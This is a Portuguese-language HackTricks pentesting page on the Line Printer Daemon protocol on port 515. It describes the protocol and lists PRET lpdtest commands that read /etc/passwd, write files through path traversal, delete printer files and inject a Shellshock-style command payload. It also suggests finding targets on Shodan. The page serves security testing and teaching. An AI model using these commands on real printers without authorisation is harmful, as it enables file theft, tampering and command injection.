hacktricks/network-services-pentesting/515-pentesting-line-printer-daemon-lpd.md
2023-06-06 18:56:34 +00:00

4.6 KiB

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥

O protocolo Line Printer Daemon (LPD) foi originalmente introduzido no Berkeley Unix nos anos 80 (posteriormente especificado pelo RFC1179).
O daemon é executado na porta 515/tcp e pode ser acessado usando o comando lpr. Para imprimir, o cliente envia um arquivo de controle definindo o trabalho/nome de usuário e um arquivo de dados contendo os dados reais a serem impressos. O tipo de entrada do arquivo de dados pode ser definido no arquivo de controle escolhendo entre vários formatos de arquivo. No entanto, cabe à implementação do LPD como lidar com os dados de impressão. Uma implementação popular do LPD para sistemas operacionais semelhantes ao Unix é o LPRng. O LPD pode ser usado como um transportador para implantar trabalhos de impressão maliciosos PostScript ou PJL.

As ferramentas lpdprint e lpdtest estão incluídas no PRET. Eles são uma maneira minimalista de imprimir dados diretamente em uma impressora capaz de LPD ou baixar/enviar/excluir arquivos e muito mais:

lpdprint.py hostname filename
lpdtest.py hostname get /etc/passwd
lpdtest.py hostname put ../../etc/passwd
lpdtest.py hostname rm /some/file/on/printer
lpdtest.py hostname in '() {:;}; ping -c1 1.2.3.4'
lpdtest.py hostname mail lpdtest@mailhost.local

Se você quer aprender mais sobre hacking de impressoras, leia esta página.

Shodan

  • porta 515
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥